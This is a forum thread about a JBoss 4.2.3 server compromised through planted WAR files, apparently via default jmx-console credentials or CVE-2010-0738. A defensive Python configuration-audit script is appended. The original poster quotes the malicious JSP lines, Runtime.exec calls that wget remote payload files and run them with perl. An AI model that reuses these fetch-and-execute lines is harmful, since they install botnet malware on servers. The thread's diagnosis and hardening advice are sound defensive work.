1. Virus?
jaikiran Apr 5, 2011 2:46 AM (in response to rkhlin)Richard Lin wrote:
Recently I found some random war folders were created in my JBoss 4.2.3 deploy folder, like the attached snapshot.
That's part of the deploy folder? Or is it in the tmp folder?
Have you seen this http://community.jboss.org/wiki/securejboss? If you are making the server accessible to the outside world (by using -b 0.0.0.0) then it's necessary that you make sure you are keeping it secure.
2. Virus?
dimitris Apr 5, 2011 2:48 AM (in response to rkhlin)I guess your jboss installation is compromised. You need to lock it up.
3. Virus?
nickarls Apr 5, 2011 2:51 AM (in response to rkhlin)ICE-unix is a file used for xwin session info but in this case it's probably used as a backdoor for pasting in new scripts etc.
Do you have any file upload stuff in your applications that might have leaked (../../../) ?
4. Re: Virus?
rkhlin Apr 6, 2011 4:40 AM (in response to jaikiran)In deploy folder, not tmp.
I use eclipse 3.3.2.
Only deploy to localhost JBoss4.2.3.
I do have upload stuff, but never into JBoss folder.
Some jsp has this:
Process process = Runtime.getRuntime().exec( "perl .ICE-unix" );
some has:
Process process = Runtime.getRuntime().exec( "wget some.other.url/data/.ICE-unix" );
some has:
Process process = Runtime.getRuntime().exec( "perl .X-un1x" );
some has:
Process process = Runtime.getRuntime().exec( "wget even.more.urls/xel/.X-un1x" );
5. Virus?
nickarls Apr 5, 2011 3:13 AM (in response to rkhlin)what is the content of the .ICE-unix and .X-un1x files?
6. Virus?
rkhlin Apr 5, 2011 7:48 AM (in response to nickarls)those ip addresses are foreign to me.
Not our local ip address at all....
So I have no clue what is in it.
If I already have it on my PC, then I may already be in serious trouble, I think.
7. Virus?
wolfc Apr 5, 2011 1:27 PM (in response to rkhlin)It is a virus! Do not download the link. It appears to be some IRC botnet called 'isasi-hack'.
8. Virus?
wolfc Apr 6, 2011 6:52 AM (in response to wolfc)For security reasons I've asked the removal of all URLs linking back to the virus. Sorry for the inconvenience.
9. Re: Virus?
kdask Apr 7, 2011 10:45 PM (in response to rkhlin)Hi, the same thing happened to me a few hours ago.
I'm using jboss 4.2.3 on ubuntu linux 10.10 and suddenly I noticed some strange .war files in my deploy dir with the same files as the first poster.
11. Re: Virus?
wus81 Jun 15, 2011 5:33 AM (in response to rkhlin)Hi,
I have the same problem, but has anyone an idea how they deployed these war archives?
I found nothing in the access log or in other log files?
Thanks,
Stef
12. Re: Virus?
jaime.chavarriaga Jul 22, 2011 12:55 PM (in response to wus81)Maybe they are using the admin-console or the jmx-console with the default user/password (admin). Using these applications, everybody can install a web application using web protocols.
If you didn't change it, you can change the information about the default user and password in some property files.
For the default server...
$JBOSS_HOME/server/default/conf/props/jmx-console-users.properties
$JBOSS_HOME/server/default/conf/props/jmx-console-roles.properties
You can get additional instructions in http://community.jboss.org/wiki/SecureJBoss
13. Re: Virus?
wus81 Oct 21, 2011 5:15 AM (in response to jaime.chavarriaga)Thanks for your reply.
I guess this describes how the server gets infected.
https://access.redhat.com/kb/docs/DOC-30741
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0738
http://www.exploit-db.com/exploits/16274/
all the best,
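The two weaknesses discussed in replies 12 and 13 (the stock admin/admin entry in jmx-console-users.properties, and CVE-2010-0738, where the jmx-console security-constraint listed only GET and POST so other HTTP verbs were not authenticated) can be checked offline on a server's config files. This is an added audit script, not code from the thread or from JBoss; the two inputs below are constructed samples shaped like the JBoss 4.2 files, and the function names are the author's own.

```python
import xml.etree.ElementTree as ET

# Constructed sample of $JBOSS_HOME/server/default/conf/props/jmx-console-users.properties
# with the shipped default entry still active.
USERS_PROPS = """# A sample users.properties file for use with the UsersRolesLoginModule
admin=admin
"""

# Constructed sample of the jmx-console web.xml security-constraint as it looked
# before the CVE-2010-0738 fix: the <http-method> elements restrict the constraint
# to GET and POST, so any other verb reaches the console without authentication.
WEB_XML = """<web-app>
  <security-constraint>
    <web-resource-collection>
      <web-resource-name>HtmlAdaptor</web-resource-name>
      <url-pattern>/*</url-pattern>
      <http-method>GET</http-method>
      <http-method>POST</http-method>
    </web-resource-collection>
    <auth-constraint><role-name>JBossAdmin</role-name></auth-constraint>
  </security-constraint>
</web-app>"""


def default_credentials(props_text):
    """Return (user, password) pairs that are active and weak: password 'admin',
    empty password, or password equal to the user name. Commented lines are skipped."""
    findings = []
    for line in props_text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        user, _, password = line.partition("=")
        user, password = user.strip(), password.strip()
        if password in ("admin", "") or user == password:
            findings.append((user, password))
    return findings


def _local(tag):
    # Strip an XML namespace ({uri}name -> name); real JBoss web.xml files use one.
    return tag.rsplit("}", 1)[-1]


def constraints_limited_to_methods(web_xml_text):
    """Return the http-method list of every security-constraint that enumerates verbs.
    The fix for CVE-2010-0738 is to remove those elements so the constraint covers all verbs."""
    root = ET.fromstring(web_xml_text)
    weak = []
    for node in root.iter():
        if _local(node.tag) == "security-constraint":
            methods = [m.text.strip() for m in node.iter() if _local(m.tag) == "http-method"]
            if methods:
                weak.append(methods)
    return weak
```

Run it against the real files by reading them into the two functions; an empty result from both is the expected state after applying the SecureJBoss wiki steps and the vendor patch.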